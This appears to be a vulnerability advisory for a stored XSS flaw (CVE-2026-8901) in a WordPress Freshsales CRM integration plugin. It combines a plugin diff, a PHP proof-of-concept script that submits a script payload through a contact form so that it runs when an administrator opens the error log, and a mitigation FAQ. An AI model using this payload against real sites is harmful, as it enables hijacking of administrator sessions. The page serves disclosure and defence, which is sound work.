+                            <svg class="integrazo-fwcrm-check-icon" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.5" stroke-linecap="round" stroke-linejoin="round">
+                                <polyline points="20 6 9 17 4 12"></polyline>
+                            </svg>
+                        </button>
+                    </a>
+                    <a class="integrazo-fwcrm-help-item"
+                        href="<?php echo esc_url('https://integrazo.com/pages/contact'); ?>"
+                        target="_blank" rel="noopener noreferrer"
+                        role="menuitem">
+                        <span class="dashicons dashicons-format-chat integrazo-fwcrm-help-item-icon" aria-hidden="true"></span>
+                        <span class="integrazo-fwcrm-help-item-text">
+                            <span class="integrazo-fwcrm-help-item-title"><?php esc_html_e('Contact support', 'crm-integration-freshworks-any-form'); ?></span>
+                            <span class="integrazo-fwcrm-help-item-sub"><?php esc_html_e('Submit a support request', 'crm-integration-freshworks-any-form'); ?></span>
+                        </span>
+                    </a>
+                    <a class="integrazo-fwcrm-help-item"
+                        href="<?php echo esc_url('https://integrazo.com/pages/request-feature'); ?>"
+                        target="_blank" rel="noopener noreferrer"
+                        role="menuitem">
+                        <span class="dashicons dashicons-lightbulb integrazo-fwcrm-help-item-icon" aria-hidden="true"></span>
+                        <span class="integrazo-fwcrm-help-item-text">
+                            <span class="integrazo-fwcrm-help-item-title"><?php esc_html_e('Request a feature', 'crm-integration-freshworks-any-form'); ?></span>
+                            <span class="integrazo-fwcrm-help-item-sub"><?php esc_html_e('Suggest an idea or improvement', 'crm-integration-freshworks-any-form'); ?></span>
+                        </span>
+                    </a>
+                    <div class="integrazo-fwcrm-help-version">
+                        <?php printf(
+                            /* translators: %s: plugin version number */
+                            esc_html__('Version %s', 'crm-integration-freshworks-any-form'),
+                            esc_html(INTEGRAZO_FWCRM_FORM_VERSION)
+                        ); ?>
+                    </div>
+                </div>
+            </div>
+             <div class="integrazo_fwcrm_form-logo-container">
             </div>
-            <p><span class="integrazo_fwcrm_form-main-message">Freshworks CRM Integration</span></p>
+            <p><span class="integrazo_fwcrm_form-main-message">Freshsales CRM Integration</span></p>
         </div>

         <div id="integrazo_fwcrm_form-plugin-tabs">
@@ -137,7 +233,7 @@
             } else {
                 echo '<p>' . esc_html__('Tab content not found.', 'crm-integration-freshworks-any-form') . '</p>';
             }
-            ?>
+    ?>
         </div>


--- a/crm-integration-freshworks-any-form/includes/admin/banner.php
+++ b/crm-integration-freshworks-any-form/includes/admin/banner.php
@@ -7,12 +7,12 @@

 <div class="integrazo_fwcrm_form-banner-wrap">

-  <div class="integrazo_fwcrm_form-banner-head">
+  <!-- <div class="integrazo_fwcrm_form-banner-head">
     <span class="integrazo_fwcrm_form-banner-title">Upgrade to Premium</span>
     <div class="integrazo_fwcrm_form-banner-offer">
       Use coupon code <code>NEWYEAR2026</code> to get <b>10% OFF</b>
     </div>
-  </div>
+  </div> -->

   <div class="integrazo_fwcrm_form-banner-plan-box">

@@ -50,11 +50,11 @@
     <a href="https://integrazo.com/products/freshworks-crm-integration-with-any-form"
        target="_blank"
        class="integrazo_fwcrm_form-banner-btn">
-       Purchase Now & Get 10% OFF
+       Upgrade to Premium
     </a>
-    <div style="margin-top: 8px; font-size: 13px; color: #666;">
+    <!-- <div style="margin-top: 8px; font-size: 13px; color: #666;">
       Limited time offer — Grab your 10% discount today!
-    </div>
+    </div> -->
   </div>

 </div>
--- a/crm-integration-freshworks-any-form/includes/admin/errorlog-tab.php
+++ b/crm-integration-freshworks-any-form/includes/admin/errorlog-tab.php
@@ -1,65 +1,65 @@
-<?php
-if ( ! defined( 'ABSPATH' ) ) {
-    exit;
-}
-// Log Tab Content
-?>
-<div id="integrazo_fwcrm_form-content-errorlog" class="integrazo_fwcrm_form-tab-content" style="display:none;">
-
-    <span class="integrazo_fwcrm_form-span-header"><?php esc_html_e('Error Logs', 'crm-integration-freshworks-any-form'); ?></span>
-
-    <div class="integrazo_fwcrm_form-help-icon-wrapper">
-        <span class="integrazo_fwcrm_form-help-icon">?</span>
-       <div class="integrazo_fwcrm_form-help-tooltip">
-            <p>View and manage your Freshsales CRM submission logs. Track successful syncs, identify failed records, retry submissions, and monitor your integration activity in one place.</p>
-        </div>
-    </div>
-    <?php
-    $message = get_transient('integrazo_fwcrm_form_error_log_success');
-
-// If there is a message, display it as an admin notice.
-if ($message) {
-    echo '<div class="notice notice-success is-dismissible">
-                <p>' . esc_html($message) . '</p>
-              </div>';
-
-    // Delete the transient after displaying the message.
-    delete_transient('integrazo_fwcrm_form_error_log_success');
-}
-// Retrieve the transient.
-$message = get_transient('integrazo_fwcrm_form_error_log_fail');
-
-// If there is a message, display it as an admin notice.
-if ($message) {
-    echo '<div class="notice notice-error is-dismissible">
-                  <p>' . esc_html($message) . '</p>
-                </div>';
-
-    // Delete the transient after displaying the message.
-    delete_transient('integrazo_fwcrm_form_error_log_fail');
-}
-?>
-    <form id="error-log-form" method="post" action="">
-        <?php
-    // Add a nonce field for security
-    wp_nonce_field('integrazo_fwcrm_form_error_log_form_action', 'integrazo_fwcrm_form_error_log_form_action_nonce');
-?>
-        <input type="hidden" name="page" value="crm-integration-freshworks-any-form">
-        <input type="hidden" name="tab" value="errorlog">
-        <?php
-
-// Display the error log table
-$error_log_table = new integrazo_fwcrm_form_ErrorLog_Extend();
-$error_log_table->prepare_items(); // Prepare error log table items
-$error_log_table->display();       // Display error log table
-?>
-    </form>
-
-</div>
-
-<div id="integrazo_fwcrm_form-error-overlay" class="integrazo_fwcrm_form-error-overlay">
-    <div class="integrazo_fwcrm_form-error-modal">
-        <span class="integrazo_fwcrm_form-error-close" onclick="closeErrorOverlay()">×</span>
-        <div id="integrazo_fwcrm_form-error-content"></div>
-    </div>
-</div>
 No newline at end of file
+<?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+// Log Tab Content
+?>
+<div id="integrazo_fwcrm_form-content-errorlog" class="integrazo_fwcrm_form-tab-content" style="display:none;">
+
+    <span class="integrazo_fwcrm_form-span-header"><?php esc_html_e('Error Logs', 'crm-integration-freshworks-any-form'); ?></span>
+
+    <div class="integrazo_fwcrm_form-help-icon-wrapper">
+        <span class="integrazo_fwcrm_form-help-icon">?</span>
+       <div class="integrazo_fwcrm_form-help-tooltip">
+            <p>View and manage your Freshsales CRM submission logs. Track successful syncs, identify failed records, retry submissions, and monitor your integration activity in one place.</p>
+        </div>
+    </div>
+    <?php
+    $integrazo_fwcrm_form_message = get_transient('integrazo_fwcrm_form_error_log_success');
+
+// If there is a message, display it as an admin notice.
+if ($integrazo_fwcrm_form_message) {
+    echo '<div class="notice notice-success is-dismissible">
+                <p>' . esc_html($integrazo_fwcrm_form_message) . '</p>
+              </div>';
+
+    // Delete the transient after displaying the message.
+    delete_transient('integrazo_fwcrm_form_error_log_success');
+}
+// Retrieve the transient.
+$integrazo_fwcrm_form_message = get_transient('integrazo_fwcrm_form_error_log_fail');
+
+// If there is a message, display it as an admin notice.
+if ($integrazo_fwcrm_form_message) {
+    echo '<div class="notice notice-error is-dismissible">
+                  <p>' . esc_html($integrazo_fwcrm_form_message) . '</p>
+                </div>';
+
+    // Delete the transient after displaying the message.
+    delete_transient('integrazo_fwcrm_form_error_log_fail');
+}
+?>
+    <form id="error-log-form" method="post" action="">
+        <?php
+    // Add a nonce field for security
+    wp_nonce_field('integrazo_fwcrm_form_error_log_form_action', 'integrazo_fwcrm_form_error_log_form_action_nonce');
+?>
+        <input type="hidden" name="page" value="crm-integration-freshworks-any-form">
+        <input type="hidden" name="tab" value="errorlog">
+        <?php
+
+// Display the error log table
+$integrazo_fwcrm_form_error_log_table = new integrazo_fwcrm_form_ErrorLog_Extend();
+$integrazo_fwcrm_form_error_log_table->prepare_items(); // Prepare error log table items
+$integrazo_fwcrm_form_error_log_table->display();       // Display error log table
+?>
+    </form>
+
+</div>
+
+<div id="integrazo_fwcrm_form-error-overlay" class="integrazo_fwcrm_form-error-overlay">
+    <div class="integrazo_fwcrm_form-error-modal">
+        <span class="integrazo_fwcrm_form-error-close" onclick="closeErrorOverlay()">×</span>
+        <div id="integrazo_fwcrm_form-error-content"></div>
+    </div>
+</div>
--- a/crm-integration-freshworks-any-form/includes/admin/other-plugins.php
+++ b/crm-integration-freshworks-any-form/includes/admin/other-plugins.php
@@ -7,9 +7,9 @@
 <div class="integrazo_fwcrm_form-op-wrapper">

   <div class="integrazo_fwcrm_form-op-header">
-    <span class="integrazo_fwcrm_form-op-title">Can’t Find the Integration You’re Looking For?</span>
+    <span class="integrazo_fwcrm_form-op-title">Looking for a Different CRM or Form Integration?</span>
     <span class="integrazo_fwcrm_form-op-subtitle">
-      Explore our free Apps Integration for WordPress plugin to link any WordPress plugin with top CRM, helpdesk, email, and productivity platforms in minutes.
+      Try our Integrazo Automator plugin — link any WordPress form with 20+ CRMs, helpdesks, email platforms, and productivity tools in minutes.
     </span>
   </div>

@@ -67,7 +67,7 @@
     <a href="https://wordpress.org/plugins/integrazo-form-connectors/"
        target="_blank"
        class="integrazo_fwcrm_form-op-btn-primary">
-       Get Free Plugin
+       Download Now
     </a>
   </div>

--- a/crm-integration-freshworks-any-form/includes/admin/premium-tab.php
+++ b/crm-integration-freshworks-any-form/includes/admin/premium-tab.php
@@ -1,5 +1,5 @@
 <?php
-if ( ! defined( 'ABSPATH' ) ) {
+if (! defined('ABSPATH')) {
     exit;
 }
 // Content for the 'Settings' tab
@@ -18,9 +18,9 @@
                 <button class="integrazo_fwcrm_form-go-premium-button">Upgrade to Premium</button>
             </a>
         </div>
-         <div class="integrazo_fwcrm_form-banner-offer">
+         <!-- <div class="integrazo_fwcrm_form-banner-offer">
       Use coupon code <code>NEWYEAR2026</code> to get <b>10% OFF</b>
-    </div>
+    </div> -->
          <br><br>
         <table class="integrazo_fwcrm_form-plan-comparison-table-wrapper">
             <thead class="integrazo_fwcrm_form-plan-table-header-container">
--- a/crm-integration-freshworks-any-form/includes/admin/settings-tab.php
+++ b/crm-integration-freshworks-any-form/includes/admin/settings-tab.php
@@ -1,220 +1,216 @@
-<?php
-if ( ! defined( 'ABSPATH' ) ) {
-    exit;
-}
-// phpcs:ignore WordPress.Security.NonceVerification.Recommended
-$menu_param = isset($_GET['menu']) ? sanitize_text_field(wp_unslash($_GET['menu'])) : 'settings';
-?>
-
-<div id="integrazo_fwcrm_form-content-settings" class="integrazo_fwcrm_form-tab-content" style="display:none;">
-
-    <?php
-    if (get_transient('integrazo_fwcrm_form_settings_saved')) {
-        // Display the notice.
-        echo '<div class="notice notice-success is-dismissible">
-            <p>' . esc_html__('Settings saved successfully.', 'crm-integration-freshworks-any-form') . '</p>
-          </div>';
-
-        // Delete the transient after displaying the notice.
-        delete_transient('integrazo_fwcrm_form_settings_saved');
-    }
-    $message = get_transient('integrazo_fwcrm_form_license_fail');
-
-    // If there is a message, display it as an admin notice.
-    if ($message) {
-        echo '<div class="notice notice-error is-dismissible">
-                <p>' . esc_html($message) . '</p>
-              </div>';
-
-        // Delete the transient after displaying the message.
-        delete_transient('integrazo_fwcrm_form_license_fail');
-    }
-    $message = get_transient('integrazo_fwcrm_form_license_success');
-
-    // If there is a message, display it as an admin notice.
-    if ($message) {
-        echo '<div class="notice notice-success is-dismissible">
-                <p>' . esc_html($message) . '</p>
-              </div>';
-
-        // Delete the transient after displaying the message.
-        delete_transient('integrazo_fwcrm_form_license_success');
-    }
-    ?>
-    <div style="margin-bottom:30px;">
-        <p class="integrazo_fwcrm_form-settings-heading integrazo_fwcrm_form-settings-heading-active" id="integrazo_fwcrm_form-settings-header"><?php esc_html_e('Settings', 'crm-integration-freshworks-any-form'); ?></p>
-        <p class="integrazo_fwcrm_form-settings-heading" id="integrazo_fwcrm_form-license-header"><?php esc_html_e('License', 'crm-integration-freshworks-any-form'); ?></p>
-    </div>
-    <!-- ----------Settings----------- -->
-    <div id="integrazo_fwcrm_form-settings-section" style="display: <?php echo ($menu_param === 'settings') ? 'block' : 'none'; ?>;">
-        <?php
-        // Fetch and sanitize options from the database
-        $delete_data_on_uninstall = get_option('integrazo_fwcrm_form_delete_data_on_uninstall', 'no') === 'yes' ? 'yes' : 'no';
-        $error_notification = get_option('integrazo_fwcrm_form_error_notification', 'no') === 'yes' ? 'yes' : 'no';
-        $error_notification_email = sanitize_text_field(get_option('integrazo_fwcrm_form_error_notification_email', ''));
-        $error_notification_subject = sanitize_text_field(get_option('integrazo_fwcrm_form_error_notification_subject', ''));
-        ?>
-
-        <form method="post" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
-            <?php wp_nonce_field('integrazo_fwcrm_form_settings_data_action', 'integrazo_fwcrm_form_settings_data_action_nonce'); ?>
-
-            <table class="form-table">
-                <tr>
-                    <th scope="row">
-                        <label for="integrazo_fwcrm_form_delete_data_on_uninstall"><?php esc_html_e('Delete Data on Uninstall', 'crm-integration-freshworks-any-form'); ?></label>
-                        <div class="integrazo_fwcrm_form-help-icon-wrapper">
-                            <span class="integrazo_fwcrm_form-help-icon">?</span>
-                            <div class="integrazo_fwcrm_form-help-tooltip">
-                                <p>Delete all plugin data automatically when the plugin is uninstalled. </p>
-                            </div>
-                        </div>
-                    </th>
-                    <td>
-                        <input type="checkbox" id="integrazo_fwcrm_form_delete_data_on_uninstall" name="integrazo_fwcrm_form_delete_data_on_uninstall" value="yes" <?php checked($delete_data_on_uninstall, 'yes'); ?> />
-                        <span><?php esc_html_e('Yes, delete all plugin data upon uninstallation', 'crm-integration-freshworks-any-form'); ?></span>
-                    </td>
-                </tr>
-
-                <tr>
-                    <th scope="row">
-                        <label for="integrazo_fwcrm_form_error_notification"><?php esc_html_e('Error Email Notification', 'crm-integration-freshworks-any-form'); ?></label>
-                        <div class="integrazo_fwcrm_form-help-icon-wrapper">
-                            <span class="integrazo_fwcrm_form-help-icon">?</span>
-                            <div class="integrazo_fwcrm_form-help-tooltip">
-                                <p>Enable to receive email notifications if data fails to post to Freshworks CRM due to errors. </p>
-                            </div>
-                        </div>
-                    </th>
-                    <td>
-                        <input type="checkbox" id="integrazo_fwcrm_form_error_notification" name="integrazo_fwcrm_form_error_notification" value="yes" <?php checked($error_notification, 'yes'); ?> />
-                        <span><?php esc_html_e('Yes, send email notifications for errors', 'crm-integration-freshworks-any-form'); ?></span>
-                    </td>
-                </tr>
-
-                <tr>
-                    <th scope="row">
-                        <label for="integrazo_fwcrm_form_error_notification_email"><?php esc_html_e('Email (comma separated)', 'crm-integration-freshworks-any-form'); ?></label>
-                    </th>
-                    <td>
-                        <input type="text" id="integrazo_fwcrm_form_error_notification_email" name="integrazo_fwcrm_form_error_notification_email" value="<?php echo esc_attr($error_notification_email); ?>" class="regular-text" />
-                        <p><?php esc_html_e('Enter email addresses separated by commas.', 'crm-integration-freshworks-any-form'); ?></p>
-                    </td>
-                </tr>
-
-                <tr>
-                    <th scope="row">
-                        <label for="integrazo_fwcrm_form_error_notification_subject"><?php esc_html_e('Email Subject', 'crm-integration-freshworks-any-form'); ?></label>
-                    </th>
-                    <td>
-                        <input type="text" id="integrazo_fwcrm_form_error_notification_subject" name="integrazo_fwcrm_form_error_notification_subject" value="<?php echo esc_attr($error_notification_subject); ?>" class="regular-text" />
-                        <p><?php esc_html_e('Enter the subject line for error notification emails.', 'crm-integration-freshworks-any-form'); ?></p>
-                    </td>
-                </tr>
-            </table>
-
-            <input type="hidden" name="action" value="integrazo_fwcrm_form_delete_data_confirm">
-            <?php submit_button(__('Save Settings', 'crm-integration-freshworks-any-form')); ?>
-        </form>
-    </div>
-    <?php
-    $integrazo_fwcrm_form_request_key = get_option('integrazo_fwcrm_form_request_key', '');
-    $key_is_valid = !empty($integrazo_fwcrm_form_request_key); // Check if the key exists
-
-    $license_expiry_time = null;
-    if ($session) {
-        $license_expiry_time = get_option('integrazo_fwcrm_form_session_key', null);
-        if ($license_expiry_time !== null) {
-            if ($license_expiry_time === "MTExMTExMTExMTExMQ==") {
-                $license_expiry_time = "Lifetime";
-            } else {
-                $license_expiry_time = base64_decode($license_expiry_time, true);
-                if ($license_expiry_time !== false) {
-
-                    $license_expiry_time = gmdate('d-M-Y', $license_expiry_time / 1000); // Convert milliseconds to date time in dd-MMM-yyyy HH:mm am/pm format
-
-                }
-            }
-        }
-    } else {
-        $license_expiry_time = get_option('integrazo_fwcrm_form_session_key', null);
-        if ($license_expiry_time !== null) {
-            $current_time = round(microtime(true) * 1000);
-            $license_expiry_time = base64_decode($license_expiry_time, true);
-            if ((int)$license_expiry_time < $current_time) {
-                $license_expiry_time = gmdate('d-M-Y', (int) $license_expiry_time / 1000) . " (Expired)";
-            }
-        }
-    }
-
-    ?>
-
-    <div id="integrazo_fwcrm_form-license-section" style="display: <?php echo ($menu_param === 'license') ? 'block' : 'none'; ?>;">
-        <div class="integrazo_fwcrm_form-license-key">
-            <p class="integrazo_fwcrm_form-license-header"><?php esc_html_e('License Key', 'crm-integration-freshworks-any-form'); ?></p>
-            <?php if (!empty($license_expiry_time)) : ?>
-                <p>
-                    <strong><?php esc_html_e('License Expiry Date: ', 'crm-integration-freshworks-any-form'); ?></strong>
-                    <span class="integrazo_fwcrm_form-license-highlighted-value"><?php echo esc_html($license_expiry_time); ?></span>
-                </p>
-                <p>
-                    <strong><?php esc_html_e('Plan: ', 'crm-integration-freshworks-any-form'); ?></strong>
-                    <span class="integrazo_fwcrm_form-license-highlighted-value"><?php echo esc_html(get_option('integrazo_fwcrm_form_session_plan', '--')); ?></span>
-                </p>
-                <p><?php esc_html_e('Your premium license is active. Enjoy all premium features!', 'crm-integration-freshworks-any-form'); ?></p>
-            <?php else : ?>
-                <p>
-                    <?php esc_html_e("Unlock more features by ", 'crm-integration-freshworks-any-form'); ?>
-                    <a href="<?php echo esc_url("https://integrazo.com/products/freshworks-crm-integration-with-any-form?utm_source=plugin&utm_medium=license_page_link&utm_campaign=freshworks_integration"); ?>" target="_blank">
-                        <?php esc_html_e('Upgrade to Premium', 'crm-integration-freshworks-any-form'); ?>
-                    </a>
-                </p>
-                <p><strong><?php esc_html_e('Already purchased?', 'crm-integration-freshworks-any-form'); ?></strong>
-                    <?php esc_html_e('Simply enter your license key below to enable premium features!', 'crm-integration-freshworks-any-form'); ?>
-                </p>
-            <?php endif; ?>
-
-            <form method="post" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
-                <?php wp_nonce_field('integrazo_fwcrm_form_request_key_action', 'integrazo_fwcrm_form_request_key_nonce'); ?>
-
-                <label for="integrazo_fwcrm_form_request_key">
-                    <input
-                        type="text"
-                        id="integrazo_fwcrm_form_request_key"
-                        name="integrazo_fwcrm_form_request_key"
-                        placeholder="<?php echo esc_attr__('Paste key here', 'crm-integration-freshworks-any-form'); ?>"
-                        class="integrazo-fwcrm-form-regular-text"
-                        value="<?php echo esc_attr($integrazo_fwcrm_form_request_key); ?>"
-                        size="50"
-                        required />
-                </label>
-                <br><br>
-
-                <input type="hidden" name="action" value="integrazo_fwcrm_form_process_request">
-
-                <?php
-                if ($key_is_valid) {
-                    // Deactivate Key Button
-                    submit_button(
-                        __('Deactivate Key', 'crm-integration-freshworks-any-form'),
-                        'secondary',
-                        'integrazo_fwcrm_form_revoke_request_key',
-                        false // Do not wrap in <p>
-                    );
-                } else {
-                    // Process Key Button
-                    submit_button(
-                        __('Process Key', 'crm-integration-freshworks-any-form'),
-                        'primary',
-                        'integrazo_fwcrm_form_process_request_key',
-                        false // Do not wrap in <p>
-                    );
-                }
-                ?>
-            </form>
-
-
-        </div>
-    </div>
-
-
-</div>
 No newline at end of file
+<?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit;
+}
+// phpcs:ignore WordPress.Security.NonceVerification.Recommended
+$integrazo_fwcrm_form_menu_param = isset($_GET['menu']) ? sanitize_text_field(wp_unslash($_GET['menu'])) : 'settings';
+?>
+
+<div id="integrazo_fwcrm_form-content-settings" class="integrazo_fwcrm_form-tab-content" style="display:none;">
+
+    <?php
+    if (get_transient('integrazo_fwcrm_form_settings_saved')) {
+        // Display the notice.
+        echo '<div class="notice notice-success is-dismissible">
+            <p>' . esc_html__('Settings saved successfully.', 'crm-integration-freshworks-any-form') . '</p>
+          </div>';
+
+        // Delete the transient after displaying the notice.
+        delete_transient('integrazo_fwcrm_form_settings_saved');
+    }
+    $integrazo_fwcrm_form_message = get_transient('integrazo_fwcrm_form_license_fail');
+
+    // If there is a message, display it as an admin notice.
+    if ($integrazo_fwcrm_form_message) {
+        echo '<div class="notice notice-error is-dismissible">
+                <p>' . esc_html($integrazo_fwcrm_form_message) . '</p>
+              </div>';
+
+        // Delete the transient after displaying the message.
+        delete_transient('integrazo_fwcrm_form_license_fail');
+    }
+    $integrazo_fwcrm_form_message = get_transient('integrazo_fwcrm_form_license_success');
+
+    // If there is a message, display it as an admin notice.
+    if ($integrazo_fwcrm_form_message) {
+        echo '<div class="notice notice-success is-dismissible">
+                <p>' . esc_html($integrazo_fwcrm_form_message) . '</p>
+              </div>';
+
+        // Delete the transient after displaying the message.
+        delete_transient('integrazo_fwcrm_form_license_success');
+    }
+    ?>
+    <div style="margin-bottom:30px;">
+        <p class="integrazo_fwcrm_form-settings-heading integrazo_fwcrm_form-settings-heading-active" id="integrazo_fwcrm_form-settings-header"><?php esc_html_e('Settings', 'crm-integration-freshworks-any-form'); ?></p>
+        <p class="integrazo_fwcrm_form-settings-heading" id="integrazo_fwcrm_form-license-header"><?php esc_html_e('License', 'crm-integration-freshworks-any-form'); ?></p>
+    </div>
+    <!-- ----------Settings----------- -->
+    <div id="integrazo_fwcrm_form-settings-section" style="display: <?php echo ($integrazo_fwcrm_form_menu_param === 'settings') ? 'block' : 'none'; ?>;">
+        <?php
+        // Fetch and sanitize options from the database
+        $integrazo_fwcrm_form_delete_data_on_uninstall = get_option('integrazo_fwcrm_form_delete_data_on_uninstall', 'no') === 'yes' ? 'yes' : 'no';
+        $integrazo_fwcrm_form_error_notification = get_option('integrazo_fwcrm_form_error_notification', 'no') === 'yes' ? 'yes' : 'no';
+        $integrazo_fwcrm_form_error_notification_email = sanitize_text_field(get_option('integrazo_fwcrm_form_error_notification_email', ''));
+        $integrazo_fwcrm_form_error_notification_subject = sanitize_text_field(get_option('integrazo_fwcrm_form_error_notification_subject', ''));
+        ?>
+
+        <form method="post" action="<?php echo esc_url(admin_url('admin-post.php')); ?>">
+            <?php wp_nonce_field('integrazo_fwcrm_form_settings_data_action', 'integrazo_fwcrm_form_settings_data_action_nonce'); ?>
+
+            <table class="form-table">
+                <tr>
+                    <th scope="row">
+                        <label for="integrazo_fwcrm_form_delete_data_on_uninstall"><?php esc_html_e('Delete Data on Uninstall', 'crm-integration-freshworks-any-form'); ?></label>
+                        <div class="integrazo_fwcrm_form-help-icon-wrapper">
+                            <span class="integrazo_fwcrm_form-help-icon">?</span>
+                            <div class="integrazo_fwcrm_form-help-tooltip">
+                                <p>Delete all plugin data automatically when the plugin is uninstalled. </p>
+                            </div>
+                        </div>
+                    </th>
+                    <td>
+                        <input type="checkbox" id="integrazo_fwcrm_form_delete_data_on_uninstall" name="integrazo_fwcrm_form_delete_data_on_uninstall" value="yes" <?php checked($integrazo_fwcrm_form_delete_data_on_uninstall, 'yes'); ?> />
+                        <span><?php esc_html_e('Yes, delete all plugin data upon uninstallation', 'crm-integration-freshworks-any-form'); ?></span>
+                    </td>
+                </tr>
+
+                <tr>
+                    <th scope="row">
+                        <label for="integrazo_fwcrm_form_error_notification"><?php esc_html_e('Error Email Notification', 'crm-integration-freshworks-any-form'); ?></label>
+                        <div class="integrazo_fwcrm_form-help-icon-wrapper">
+                            <span class="integrazo_fwcrm_form-help-icon">?</span>
+                            <div class="integrazo_fwcrm_form-help-tooltip">
+                                <p>Enable to receive email notifications if data fails to post to Freshworks CRM due to errors. </p>
+                            </div>
+                        </div>
+                    </th>
+                    <td>
+                        <input type="checkbox" id="integrazo_fwcrm_form_error_notification" name="integrazo_fwcrm_form_error_notification" value="yes" <?php checked($integrazo_fwcrm_form_error_notification, 'yes'); ?> />
+                        <span><?php esc_html_e('Yes, send email notifications for errors', 'crm-integration-freshworks-any-form'); ?></span>
+                    </td>
+                </tr>
+
+                <tr>
+                    <th scope="row">
+                        <label for="integrazo_fwcrm_form_error_notification_email"><?php esc_html_e('Email (comma separated)', 'crm-integration-freshworks-any-form'); ?></label>
+                    </th>
+                    <td>
+                        <input type="text" id="integrazo_fwcrm_form_error_notification_email" name="integrazo_fwcrm_form_error_notification_email" value="<?php echo esc_attr($integrazo_fwcrm_form_error_notification_email); ?>" class="regular-text integrazo-fwcrm-form-settings-input" />
+                        <p><?php esc_html_e('Enter email addresses separated by commas.', 'crm-integration-freshworks-any-form'); ?></p>
+                    </td>
+                </tr>
+
+                <tr>
+                    <th scope="row">
+                        <label for="integrazo_fwcrm_form_error_notification_subject"><?php esc_html_e('Email Subject', 'crm-integration-freshworks-any-form'); ?></label>
+                    </th>
+                    <td>
+                        <input type="text" id="integrazo_fwcrm_form_error_notification_subject" name="integrazo_fwcrm_form_error_notification_subject" value="<?php echo esc_attr($integrazo_fwcrm_form_error_notification_subject); ?>" class="regular-text integrazo-fwcrm-form-settings-input" />
+                        <p><?php esc_html_e('Enter the subject line for error notification emails.', 'crm-integration-freshworks-any-form'); ?></p>
+

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-8901 - Integration for Freshsales <= 1.0.15 - Unauthenticated Stored XSS via Form Submission Data

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$form_endpoint = '/wp-json/contact-form-7/v1/contact-forms/1/feedback'; // Example for Contact Form 7 REST API; adjust for other forms
// Alternative: $form_endpoint = '/wp-admin/admin-ajax.php'; // For AJAX-based forms like WPForms

// XSS payload to inject
$xss_payload = '<script>alert("XSS by Atomic Edge CVE Research");</script>';

// Step 1: Submit a form with malicious payload
$post_data = array(
    'your-name' => $xss_payload,
    'your-email' => 'attacker@example.com',
    'your-message' => 'Test submission to trigger error log XSS',
    // Include any required fields for the form
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . $form_endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'X-Requested-With: XMLHttpRequest',
));
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Submitted form with XSS payload: $xss_payloadn";
echo "[+] Response: $responsen";

// Step 2: The payload is now stored in the plugin's error log.
// An administrator viewing the error log details modal will trigger the XSS.
// To verify, log in as admin, navigate to Freshsales > Error Log, and click the entry.
?>

Frequently Asked Questions

What is CVE-2026-8901?
Understanding the vulnerability
CVE-2026-8901 is a high-severity vulnerability in the Integration for Freshsales plugin for WordPress, affecting versions up to 1.0.15. It allows unauthenticated stored cross-site scripting (XSS) via form submission data due to insufficient input sanitization and output escaping.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to inject malicious JavaScript into form fields. When a CRM API call fails, the plugin logs the raw form submission data, which can include the injected script. If an administrator views the error log, the script executes in their browser session.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Integration for Freshsales plugin version 1.0.15 or earlier is affected. Administrators who view error logs in the WordPress admin panel are particularly at risk.
How can I check if my site is vulnerable?
Assessment steps
Check the version of the Integration for Freshsales plugin installed on your WordPress site. If it is version 1.0.15 or earlier, your site is vulnerable. Additionally, review any error logs for suspicious entries.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Integration for Freshsales plugin to version 1.0.16 or later. This version includes a patch that implements proper output escaping to prevent XSS.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin temporarily or restricting access to the WordPress admin panel. Additionally, monitor error logs closely for any signs of exploitation.
What does the CVSS score of 7.2 indicate?
Understanding risk levels
A CVSS score of 7.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant consequences, such as unauthorized access to sensitive data or administrative capabilities.
How does the proof of concept demonstrate the issue?
Technical demonstration
The proof of concept shows how an attacker can submit a form with a malicious payload. It illustrates the process of triggering an error log entry that contains the injected script, which executes when an administrator views the log.
What are the potential impacts of exploitation?
Consequences of a successful attack
If exploited, an attacker can execute arbitrary JavaScript in the context of an administrator’s session. This could lead to actions such as creating new admin accounts, exfiltrating sensitive data, or modifying site content.
How can I secure my WordPress site against similar vulnerabilities?
Best practices for security
Regularly update all plugins and themes to their latest versions, implement strong access controls, and monitor logs for unusual activity. Additionally, consider using security plugins that provide firewall and scanning capabilities.
Where can I find more information about CVE-2026-8901?
Resources for further reading
